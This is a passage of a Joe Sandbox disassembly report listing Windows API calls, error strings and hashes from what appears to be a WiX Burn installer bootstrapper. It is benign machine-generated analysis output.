                                                            • GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,00000000,00000000,?,0087A8B4,00000100,000002C0,000002C0,00000100), ref: 00879B10
                                                            • GetLastError.KERNEL32(?,0087A8B4,00000100,000002C0,000002C0,00000100), ref: 00879B1B
                                                            Strings
                                                            • Failed to format variable string., xrefs: 00879B06
                                                            • Failed to set variable., xrefs: 00879B7A
                                                            • Failed while searching directory search: %ls, for path: %ls, xrefs: 00879B54
                                                            Similarity
                                                            • API ID: AttributesErrorFileLastOpen@16
                                                            • String ID: Failed to format variable string.$Failed to set variable.$Failed while searching directory search: %ls, for path: %ls
                                                            • API String ID: 1811509786-402580132
                                                            APIs
                                                            • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00890CC4
                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00890CD6
                                                            • SetFileTime.KERNEL32(?,?,?,?), ref: 00890CE9
                                                            • CloseHandle.KERNEL32(000000FF,?,?,?,?,?,?,?,?,?,?,?,?,008908B1,?,?), ref: 00890CF8
                                                            Strings
                                                            • cabextract.cpp, xrefs: 00890C93
                                                            • Invalid operation for this state., xrefs: 00890C9D
                                                            Similarity
                                                            • API ID: Time$File$CloseDateHandleLocal
                                                            • String ID: Invalid operation for this state.$cabextract.cpp
                                                            • API String ID: 609741386-1751360545
                                                            APIs
                                                            • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,crypt32.dll,00000000,00000000,00000000,?,0088539D), ref: 00884AC3
                                                            Strings
                                                            • pipe.cpp, xrefs: 00884AFB
                                                            • Failed to allocate message to write., xrefs: 00884AA2
                                                            • Failed to write message type to pipe., xrefs: 00884B05
                                                            • crypt32.dll, xrefs: 00884A7D
                                                            Similarity
                                                            • API ID: FileWrite
                                                            • String ID: Failed to allocate message to write.$Failed to write message type to pipe.$crypt32.dll$pipe.cpp
                                                            • API String ID: 3934441357-606776022
                                                            APIs
                                                              • Part of subcall function 0087394F: GetProcessHeap.KERNEL32(?,000001C7,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873960
                                                              • Part of subcall function 0087394F: RtlAllocateHeap.NTDLL(00000000,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873967
                                                            • _memcpy_s.LIBCMT ref: 00884693
                                                            • _memcpy_s.LIBCMT ref: 008846A6
                                                            • _memcpy_s.LIBCMT ref: 008846C1
                                                            Strings
                                                            Similarity
                                                            • API ID: _memcpy_s$Heap$AllocateProcess
                                                            • String ID: Failed to allocate memory for message.$feclient.dll$pipe.cpp
                                                            • API String ID: 886498622-766083570
                                                            APIs
                                                            • ShellExecuteExW.SHELL32(?), ref: 008B3CC0
                                                            • GetLastError.KERNEL32(?,?,00000000), ref: 008B3CCA
                                                            • CloseHandle.KERNEL32(?,?,?,00000000), ref: 008B3CFD
                                                            Strings
                                                            Similarity
                                                            • API ID: CloseErrorExecuteHandleLastShell
                                                            • String ID: <$PDu$shelutil.cpp
                                                            • API String ID: 3023784893-2418939910
                                                            APIs
                                                            • SysFreeString.OLEAUT32(00000000), ref: 00879AC4
                                                            Strings
                                                            • Failed to get Condition inner text., xrefs: 00879A94
                                                            • Failed to select condition node., xrefs: 00879A7B
                                                            • Failed to copy condition string from BSTR, xrefs: 00879AAE
                                                            • `<u, xrefs: 00879AC4
                                                            • Condition, xrefs: 00879A5F
                                                            Similarity
                                                            • API ID: FreeString
                                                            • String ID: Condition$Failed to copy condition string from BSTR$Failed to get Condition inner text.$Failed to select condition node.$`<u
                                                            • API String ID: 3341692771-266405526
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                            • API String ID: 0-1718035505
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00875EB2,00000000), ref: 008B0AE0
                                                            • GetProcAddress.KERNEL32(00000000), ref: 008B0AE7
                                                            • GetLastError.KERNEL32(?,?,?,00875EB2,00000000), ref: 008B0AFE
                                                            Strings
                                                            Similarity
                                                            • API ID: AddressErrorHandleLastModuleProc
                                                            • String ID: IsWow64Process$kernel32$procutil.cpp
                                                            • API String ID: 4275029093-1586155540
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,008A3479,008A3479,?,?,?,008AA45C,00000001,00000001,ECE85006), ref: 008AA265
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,008AA45C,00000001,00000001,ECE85006,?,?,?), ref: 008AA2EB
                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,ECE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 008AA3E5
                                                            • __freea.LIBCMT ref: 008AA3F2
                                                              • Part of subcall function 008A521A: HeapAlloc.KERNEL32(00000000,?,?,?,008A1F87,?,0000015D,?,?,?,?,008A33E0,000000FF,00000000,?,?), ref: 008A524C
                                                            • __freea.LIBCMT ref: 008AA3FB
                                                            • __freea.LIBCMT ref: 008AA420
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__freea$AllocHeap
                                                            • String ID:
                                                            • API String ID: 3147120248-0
                                                            APIs
                                                            • Sleep.KERNEL32(000007D0,00000000,00000000), ref: 00888D18
                                                            Strings
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID: Failed to calculate cache path.$Failed to get %hs package cache root directory.$Failed to get old %hs package cache root directory.$per-machine$per-user
                                                            • API String ID: 3472027048-398165853
                                                            APIs
                                                            • DefWindowProcW.USER32(?,00000082,?,?), ref: 0088E985
                                                            • SetWindowLongW.USER32(?,000000EB,00000000), ref: 0088E994
                                                            • SetWindowLongW.USER32(?,000000EB,?), ref: 0088E9A8
                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 0088E9B8
                                                            • GetWindowLongW.USER32(?,000000EB), ref: 0088E9D2
                                                            • PostQuitMessage.USER32(00000000), ref: 0088EA31
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Window$Long$Proc$MessagePostQuit
                                                            • String ID:
                                                            • API String ID: 3812958022-0
                                                            • Opcode ID: 262fece214e9a4e7ac06c27797c4800d636be08f1e263af1256a30c57311c8fe
                                                            • Instruction ID: 70b71576be9f8be5402e750acf34eb8c6f97b1bf125adae8d36254b4a76cd6d6
                                                            • Instruction Fuzzy Hash: 5921F531104218BFDF15AF68DC48E6A3FA5FF58710F144618F90AEA2A4C771DD10DB51
                                                            APIs
                                                            Strings
                                                            • elevation.cpp, xrefs: 0088C9B8
                                                            • Unexpected elevated message sent to child process, msg: %u, xrefs: 0088C9C4
                                                            • Failed to save state., xrefs: 0088C891
                                                            Similarity
                                                            • API ID: CloseHandleMutexRelease
                                                            • String ID: Failed to save state.$Unexpected elevated message sent to child process, msg: %u$elevation.cpp
                                                            • API String ID: 4207627910-1576875097
                                                            • Opcode ID: 8b10ef81f01f241a1c95291a008c8643c080907d11fb8b4373f8ccf793e40ef8
                                                            • Instruction ID: 9b1d5dc3bc1582baf69cb62f4f03366ced281611b42a1ab72b2fd7a717fa9097
                                                            • Instruction Fuzzy Hash: 1061B73A100514EFCB126F84CE01C55BFB2FF48314715C599FAA99A636C732E921EF56
                                                            APIs
                                                              • Part of subcall function 0087394F: GetProcessHeap.KERNEL32(?,000001C7,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873960
                                                              • Part of subcall function 0087394F: RtlAllocateHeap.NTDLL(00000000,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873967
                                                            • SysFreeString.OLEAUT32(00000000), ref: 008B7C74
                                                            • SysFreeString.OLEAUT32(00000000), ref: 008B7C7F
                                                            • SysFreeString.OLEAUT32(00000000), ref: 008B7C8A
                                                            Similarity
                                                            • API ID: FreeString$Heap$AllocateProcess
                                                            • String ID: `<u$atomutil.cpp
                                                            • API String ID: 2724874077-4051019476
                                                            • Opcode ID: 337e29b80529944037bec7cedc5ff6ee58942895d8a5388c847954df8ce75fc4
                                                            • Instruction ID: cc79a5445ecee51adbd97a8456380453aa259f4e15404a25e0d1aa26c420aa36
                                                            • Instruction Fuzzy Hash: B551707190422AAFDB21DB68C855EEEBBB8FF84710F154198E905EB251D771ED00CBA1
                                                            APIs
                                                            • RegQueryValueExW.ADVAPI32(00000000,000002C0,00000000,000002C0,00000000,00000000,000002C0,BundleUpgradeCode,00000410,000002C0,00000000,00000000,00000000,00000100,00000000), ref: 008B123F
                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,008870E8,00000100,000000B0,00000088,00000410,000002C0), ref: 008B1276
                                                            • lstrlenW.KERNEL32(?,?,?,00000000,?,-00000001,00000004,00000000), ref: 008B136E
                                                            Similarity
                                                            • API ID: QueryValue$lstrlen
                                                            • String ID: BundleUpgradeCode$regutil.cpp
                                                            • API String ID: 3790715954-1648651458
                                                            • Opcode ID: d1a2e3630becbddd4db36499de097aaadd10150a3673550a9877e2ec1e2fd0db
                                                            • Instruction ID: 545500bf450f3caf17797063bbc7c85c0654283f26d5e4fa58339178bb5cb709
                                                            • Instruction Fuzzy Hash: 4341B235A0011AEFDF21DF99C868AEEB7A9FF48710F954169E901EF705E634DD009BA0
                                                            APIs
                                                              • Part of subcall function 008B490D: SetFilePointerEx.KERNELBASE(?,?,?,?,?,00000000,?,?,?,00888770,00000000,00000000,00000000,00000000,00000000), ref: 008B4925
                                                              • Part of subcall function 008B490D: GetLastError.KERNEL32(?,?,?,00888770,00000000,00000000,00000000,00000000,00000000), ref: 008B492F
                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,008B5C09,?,?,?,?,?,?,?,00010000,?), ref: 008B63C0
                                                            • WriteFile.KERNEL32(000000FF,00000008,00000008,?,00000000,000000FF,00000000,00000000,00000000,00000000,?,008B5C09,?,?,?,?), ref: 008B6412
                                                            • GetLastError.KERNEL32(?,008B5C09,?,?,?,?,?,?,?,00010000,?,00000001,?,GET,?,?), ref: 008B6458
                                                            • GetLastError.KERNEL32(?,008B5C09,?,?,?,?,?,?,?,00010000,?,00000001,?,GET,?,?), ref: 008B647E
                                                            Similarity
                                                            • API ID: ErrorFileLast$Write$Pointer
                                                            • String ID: dlutil.cpp
                                                            • API String ID: 133221148-2067379296
                                                            • Opcode ID: 584885160ddae4a5b2c3f45c9b6617d15ccef6c33e33e30c0a559c5928e35281
                                                            • Instruction ID: 675723f7c3e4a21d79377b366e1163e7e11b013333a3a5a588730f87103b0335
                                                            • Instruction Fuzzy Hash: 0141A27290061ABFDB218E94CD45BEE7BA8FF04720F154225FD04E62A0E779DD20DBA5
                                                            APIs
                                                            • WideCharToMultiByte.KERNEL32(?,00000000,008AFFEF,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,008AFFEF,008912CF,?,00000000), ref: 0087246E
                                                            • GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,008AFFEF,008912CF,?,00000000,0000FDE9,?,008912CF), ref: 0087247A
                                                              • Part of subcall function 00873BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,008721CC,000001C7,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873BDB
                                                              • Part of subcall function 00873BD3: HeapSize.KERNEL32(00000000,?,008721CC,000001C7,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873BE2
                                                            Similarity
                                                            • API ID: Heap$ByteCharErrorLastMultiProcessSizeWide
                                                            • String ID: strutil.cpp
                                                            • API String ID: 3662877508-3612885251
                                                            • Opcode ID: 59b507ecdc597f63ec512f15d421c4da3628008876b53e4f65f028f53a9ec78a
                                                            • Instruction ID: 40fc388cb3d718670be0022778c2ba72d40062ae6a91ef90d5702518ad0a9f1b
                                                            • Instruction Fuzzy Hash: 6F31F63030061AEFE7109E698CC4A7637D9FB54368B10C329FE29DB2A8E771CC019765
                                                            APIs
                                                            • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,?,000000FF,?,00000000,?,?,?,00000000,00000000,?,?,00000000), ref: 0089ADB3
                                                            Strings
                                                            • Failed to extract payload: %ls from container: %ls, xrefs: 0089AE3E
                                                            • Failed to extract all payloads from container: %ls, xrefs: 0089ADF7
                                                            • Failed to skip the extraction of payload: %ls from container: %ls, xrefs: 0089AE4A
                                                            • Failed to open container: %ls., xrefs: 0089AD85
                                                            Similarity
                                                            • API ID: CompareString
                                                            • String ID: Failed to extract all payloads from container: %ls$Failed to extract payload: %ls from container: %ls$Failed to open container: %ls.$Failed to skip the extraction of payload: %ls from container: %ls
                                                            • API String ID: 1825529933-3891707333
                                                            • Opcode ID: 138599948c2214354118448380370b4b6aa0c72bec1d5c1a3362b806073a2ea3
                                                            • Instruction ID: ab69d97f37d61cf613560ab552087938a715661768b4b993a96eb3e223c89b71
                                                            • Instruction Fuzzy Hash: 7C31B032C00129ABCF22AAE88C45E9E7778FF04710F144215FA21E7691E735DA55DBE2
                                                            APIs
                                                              • Part of subcall function 0087394F: GetProcessHeap.KERNEL32(?,000001C7,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873960
                                                              • Part of subcall function 0087394F: RtlAllocateHeap.NTDLL(00000000,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873967
                                                            • SysFreeString.OLEAUT32(00000000), ref: 008B7AF4
                                                            • SysFreeString.OLEAUT32(?), ref: 008B7AFF
                                                            • SysFreeString.OLEAUT32(00000000), ref: 008B7B0A
                                                            Similarity
                                                            • API ID: FreeString$Heap$AllocateProcess
                                                            • String ID: `<u$atomutil.cpp
                                                            • API String ID: 2724874077-4051019476
                                                            • Opcode ID: ea1cef3d4225314a7d9bc9f0f7ee5324e14f83f4ebe19890c447e028389e9ad9
                                                            • Instruction ID: 265274c47a098a42eb5a6e134f6302cbeaa281937df3de4978e20bee0d8af59f
                                                            • Instruction Fuzzy Hash: 28315232D05639BBCB229A98CC45EDEBBA8FF44750F114165E904FB351D770EE009B91
                                                            APIs
                                                            • CompareStringW.KERNEL32(0000007F,00000000,00000001,000000FF,?,000000FF,00000001,PackageVersion,00000001,?,00880654,00000001,00000001,00000001,00880654,00000000), ref: 0087F07D
                                                            • RegCloseKey.ADVAPI32(00000000,00000001,PackageVersion,00000001,?,00880654,00000001,00000001,00000001,00880654,00000000,00000001,00000000,?,00880654,00000001), ref: 0087F09A
                                                            Strings
                                                            • Failed to remove update registration key: %ls, xrefs: 0087F0C7
                                                            • Failed to format key for update registration., xrefs: 0087F033
                                                            • PackageVersion, xrefs: 0087F05E
                                                            Similarity
                                                            • API ID: CloseCompareString
                                                            • String ID: Failed to format key for update registration.$Failed to remove update registration key: %ls$PackageVersion
                                                            • API String ID: 446873843-3222553582
                                                            • Opcode ID: 65890f0b17b05a1fed32d7d11edc91982335942c00e0741df23fd962e3cdef1f
                                                            • Instruction ID: ff285f496087ff868308d5c57802f208a7301adf41f4897e331d4be27e5b63ff
                                                            • Instruction Fuzzy Hash: 03218731D40529BBCB21AA69CC05FAFBF78FF05720F104265B914E2356D7319900DA91
                                                            APIs
                                                              • Part of subcall function 008B4440: FindFirstFileW.KERNEL32(0089923A,?,00000100,00000000,00000000), ref: 008B447B
                                                              • Part of subcall function 008B4440: FindClose.KERNEL32(00000000), ref: 008B4487
                                                            • RegCloseKey.ADVAPI32(?,00000000,?,00000000,?,00000000,?,00000000,?,wininet.dll,?,crypt32.dll,?,?,?,00000000), ref: 008B4430
                                                              • Part of subcall function 008B0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,008DAAA0,00000000,?,008B57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 008B0F80
                                                              • Part of subcall function 008B1217: RegQueryValueExW.ADVAPI32(00000000,000002C0,00000000,000002C0,00000000,00000000,000002C0,BundleUpgradeCode,00000410,000002C0,00000000,00000000,00000000,00000100,00000000), ref: 008B123F
                                                              • Part of subcall function 008B1217: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,008870E8,00000100,000000B0,00000088,00000410,000002C0), ref: 008B1276
                                                            Similarity
                                                            • API ID: CloseFindQueryValue$FileFirstOpen
                                                            • String ID: PendingFileRenameOperations$SYSTEM\CurrentControlSet\Control\Session Manager$\$crypt32.dll
                                                            • API String ID: 3397690329-3978359083
                                                            • Opcode ID: 569681beb226ac319da95f8dd76698961d55fdb381ab848a44cc94aaaa3e45fe
                                                            • Instruction ID: b21514856d1bafe7d6c10498be5cc1283eeffd54bfde27fedae86d682f4219fd
                                                            • Instruction Fuzzy Hash: EE31AD31A01209AADF20AF95CC42AFEBBB5FB04750F54917AEA05E6352E3319E60CB55
                                                            APIs
                                                            • CopyFileW.KERNEL32(00000000,00874DBC,00000000,?,?,00000000,?,008B412D,00000000,00874DBC,00000000,00000000,?,008885EE,?,?), ref: 008B4033
                                                            • GetLastError.KERNEL32(?,008B412D,00000000,00874DBC,00000000,00000000,?,008885EE,?,?,00000001,00000003,000007D0,?,?,?), ref: 008B4041
                                                            • CopyFileW.KERNEL32(00000000,00874DBC,00000000,00874DBC,00000000,?,008B412D,00000000,00874DBC,00000000,00000000,?,008885EE,?,?,00000001), ref: 008B40AC
                                                            • GetLastError.KERNEL32(?,008B412D,00000000,00874DBC,00000000,00000000,?,008885EE,?,?,00000001,00000003,000007D0,?,?,?), ref: 008B40B6
                                                            Similarity
                                                            • API ID: CopyErrorFileLast
                                                            • String ID: fileutil.cpp
                                                            • API String ID: 374144340-2967768451
                                                            • Opcode ID: efae1d97600ed8072d8855708b5cf2e18b0c0824b84aa06734b10d3e8ed3c006
                                                            • Instruction ID: 1a9a189535287e4e9551a83e3824970cde800a8c213ef9858a1c833f21648776
                                                            • Opcode Fuzzy Hash: efae1d97600ed8072d8855708b5cf2e18b0c0824b84aa06734b10d3e8ed3c006
                                                            • Instruction Fuzzy Hash: A0210736640B3697DB703A994C92BBB76A8FF14B60B151136FF04DB313E7A08C4292E1
                                                            APIs
                                                            • _MREFOpen@16.MSPDB140-MSVCRT ref: 0087EF56
                                                              • Part of subcall function 008B4153: SetFileAttributesW.KERNEL32(0089923A,00000080,00000000,0089923A,000000FF,00000000,?,?,0089923A), ref: 008B4182
                                                              • Part of subcall function 008B4153: GetLastError.KERNEL32(?,?,0089923A), ref: 008B418C
                                                              • Part of subcall function 00873C6B: RemoveDirectoryW.KERNEL32(00000001,00000000,00000000,00000000,?,?,0087EFA1,00000001,00000000,00000095,00000001,00880663,00000095,00000000,swidtag,00000001), ref: 00873C88
                                                            Strings
                                                            • Failed to allocate regid file path., xrefs: 0087EFB5
                                                            • swidtag, xrefs: 0087EF65
                                                            • Failed to format tag folder path., xrefs: 0087EFC3
                                                            • Failed to allocate regid folder path., xrefs: 0087EFBC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AttributesDirectoryErrorFileLastOpen@16Remove
                                                            • String ID: Failed to allocate regid file path.$Failed to allocate regid folder path.$Failed to format tag folder path.$swidtag
                                                            • API String ID: 1428973842-4170906717
                                                            • Opcode ID: e296baf916ebd3e69f81356b8cf71734a96eb322ed52abf3923b4c2de7363720
                                                            • Instruction ID: b43fae3fb5948e34e28da3b3ad6a1e0e15c22f76f9e947a0019c98c1b683842d
                                                            • Opcode Fuzzy Hash: e296baf916ebd3e69f81356b8cf71734a96eb322ed52abf3923b4c2de7363720
                                                            • Instruction Fuzzy Hash: A2216931D05518EBCB15EB9DC841B9DFBB5FF48310F10C0E5E418EA2A6DB31DA41AB91
                                                            APIs
                                                              • Part of subcall function 008B0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,008DAAA0,00000000,?,008B57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 008B0F80
                                                            • CompareStringW.KERNEL32(00000000,00000001,00000000,000000FF,?,000000FF,00000000,00000000,00000000,-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,00000000,00000100,00000100,000001B4), ref: 00898E3A
                                                            • RegCloseKey.ADVAPI32(00000000,-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,00000000,00000100,00000100,000001B4,?,?,?,0087F7E0,00000001,00000100,000001B4,00000000), ref: 00898E88
                                                            Strings
                                                            • Failed to open uninstall registry key., xrefs: 00898DFD
                                                            • SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00898DD7
                                                            • Failed to enumerate uninstall key for related bundles., xrefs: 00898E99
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CloseCompareOpenString
                                                            • String ID: Failed to enumerate uninstall key for related bundles.$Failed to open uninstall registry key.$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                                                            • API String ID: 2817536665-2531018330
                                                            • Opcode ID: 7b5975296db59e9010c9207f9935f642258d97ca591827c8ff6bec8945efab2c
                                                            • Instruction ID: cc0ea910bbe5b4c517b5af57cb20d3fbd28dc3bc963e4414e0d7ca9a901d9544
                                                            • Opcode Fuzzy Hash: 7b5975296db59e9010c9207f9935f642258d97ca591827c8ff6bec8945efab2c
                                                            • Instruction Fuzzy Hash: FA21A33294022AFEDF11BA94CC56FEEBB79FB01720F284264F410E6160DB755E90D690
                                                            APIs
                                                              • Part of subcall function 0087394F: GetProcessHeap.KERNEL32(?,000001C7,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873960
                                                              • Part of subcall function 0087394F: RtlAllocateHeap.NTDLL(00000000,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873967
                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0089D2EE
                                                            • ReleaseMutex.KERNEL32(?), ref: 0089D31C
                                                            • SetEvent.KERNEL32(?), ref: 0089D325
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Heap$AllocateEventMutexObjectProcessReleaseSingleWait
                                                            • String ID: Failed to allocate buffer.$NetFxChainer.cpp
                                                            • API String ID: 944053411-3611226795
                                                            • Opcode ID: 0f607bc1f149c87dbb854073027353379b9cfd27c84e67ba7e4d659031a2e43c
                                                            • Instruction ID: 912c30e72c7f34605581e4f9cc991375e69a8eaa4c8dd68aa1d0fe3a0f87f7a7
                                                            • Opcode Fuzzy Hash: 0f607bc1f149c87dbb854073027353379b9cfd27c84e67ba7e4d659031a2e43c
                                                            • Instruction Fuzzy Hash: C521DEB0A0030ABFDB10AF68D844A99BBF5FF48324F148629F964E7351C3B1E9508B91
                                                            APIs
                                                            • QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,?,00000001,00000000,?,?,00896B11,00000000,?), ref: 008B591D
                                                            • GetLastError.KERNEL32(?,?,00896B11,00000000,?,?,?,?,?,?,?,?,?,00896F28,?,?), ref: 008B592B
                                                              • Part of subcall function 0087394F: GetProcessHeap.KERNEL32(?,000001C7,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873960
                                                              • Part of subcall function 0087394F: RtlAllocateHeap.NTDLL(00000000,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873967
                                                            • QueryServiceConfigW.ADVAPI32(00000000,00000000,?,?,?,00000001,?,?,00896B11,00000000,?), ref: 008B5965
                                                            • GetLastError.KERNEL32(?,?,00896B11,00000000,?,?,?,?,?,?,?,?,?,00896F28,?,?), ref: 008B596F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ConfigErrorHeapLastQueryService$AllocateProcess
                                                            • String ID: svcutil.cpp
                                                            • API String ID: 355237494-1746323212
                                                            • Opcode ID: 767b8ad1bd04977bfcfc203cd5219fb48baafd05f143071d1d50643f57110ad3
                                                            • Instruction ID: b9dad0278207ee4595608511a72077e17f5ca4a69b32e6da5ea53699be2a1c1a
                                                            • Opcode Fuzzy Hash: 767b8ad1bd04977bfcfc203cd5219fb48baafd05f143071d1d50643f57110ad3
                                                            • Instruction Fuzzy Hash: C721CF36941A39E7E7216B95AC05BEBAE69FB44BB0B114111BD44EB300E660CE0096E2
                                                            APIs
                                                            • SysAllocString.OLEAUT32(?), ref: 008B3258
                                                            • VariantInit.OLEAUT32(?), ref: 008B3264
                                                            • VariantClear.OLEAUT32(?), ref: 008B32D8
                                                            • SysFreeString.OLEAUT32(00000000), ref: 008B32E3
                                                              • Part of subcall function 008B3498: SysAllocString.OLEAUT32(?), ref: 008B34AD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: String$AllocVariant$ClearFreeInit
                                                            • String ID: `<u
                                                            • API String ID: 347726874-3367579956
                                                            • Opcode ID: f4009c7a2d5c13522e62ba2bfe9007127074f5103c21d2f46784719aef164f44
                                                            • Instruction ID: ed8065cbadf9fd734c25d53164e1c16ed0a9442717742580b3ff33ee9cd658bd
                                                            • Opcode Fuzzy Hash: f4009c7a2d5c13522e62ba2bfe9007127074f5103c21d2f46784719aef164f44
                                                            • Instruction Fuzzy Hash: FE214C35A01619AFDB14DFA4C858EEEBBB9FF48716F144258E801EB320D7319E05CB90
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
